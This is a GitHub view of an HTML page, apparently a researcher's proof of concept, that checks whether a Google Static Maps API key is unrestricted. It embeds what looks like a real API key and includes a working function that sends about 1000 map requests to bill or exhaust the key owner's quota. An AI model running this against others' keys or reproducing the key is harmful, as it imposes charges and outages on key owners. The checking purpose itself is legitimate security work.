-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathGoogleMapsAPIKeyProtectionTest.html
68 lines (51 loc) · 2.73 KB
/
GoogleMapsAPIKeyProtectionTest.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
<!DOCTYPE html>
<html>
<head>
<style>
/* Set the size of the div element that contains the map */
#map {
height: 400px; /* The height is 400 pixels */
width: 100%; /* The width is the width of the web page */
}
</style>
</head>
<body>
<h2>Unprotected Google Key Test for Static Maps API by German Flores</h2>
Insert Google API Key: <input type="text" id="KEY" value="AIzaSyCGOJbGQ95SWrXxl8wk-_cRQZcJl42bvDU"/>
<input type="button" value="CheckKey" onclick="showMap()" />
<div id="map">
<img id="mapImg" onerror="keywellProtected()" />
</div>
<div id="resultmessage"> $ </div>
<!--<input type="button" id="run1000button" value="Run 1000 times and make owner of key spend $2USD" onclick="show1000Maps()" style="visibility: hidden;"/>
-->
<script>
function keywellProtected(){
//document.getElementById("run1000button").style.visibility = "hidden";
document.getElementById("resultmessage").innerText = ' The key is well protected. That means 1.Google MAPS Static API is not enabled for this key 2. Is enabled but dont allow me to use from my domain. To check error visit https://maps.googleapis.com/maps/api/staticmap?center=40.714%2c%20-73.998&zoom=13&size=400x400&key='+document.getElementById("KEY").value;
}
function showMap(){
var apikey=document.getElementById("KEY").value;
var mapstaticurl="https://maps.googleapis.com/maps/api/staticmap?center=40.714%2c%20-73.998&zoom=13&size=400x400&key="+apikey;
document.getElementById("mapImg").src = mapstaticurl;
//document.getElementById("run1000button").style.visibility = "visible";
document.getElementById("resultmessage").innerText = 'WARNING!!!!!!KEY NOT PROTECTED. I am using this key to plot a Maps in my website :)';
}
function show1000Maps(){
var apikey=document.getElementById("KEY").value;
var mapstaticurl;
var message="WARNING!! This function will randomnly request 1000 maps on random location using the key above. You will cause charges on the owner of that key or a Denial of Service if that account is not set billing . The purpose of this function is to cause proof of concept. Please don't use this for evil purposes";
if(confirm(message)){
for (var i = 1; i < 999; i++) {
lat=Math.random()*180-90;
long=Math.random()*360-180;
console.log("Run"+i+" Lat:"+lat+" ,Long:"+long);
var mapstaticurl="https://maps.googleapis.com/maps/api/staticmap?center="+lat+"%2c%20"+long+"&zoom=9&size=400x400&key="+apikey;
document.getElementById("mapImg").src = mapstaticurl;
}
}
}
</script>
</html>
</body>
</html>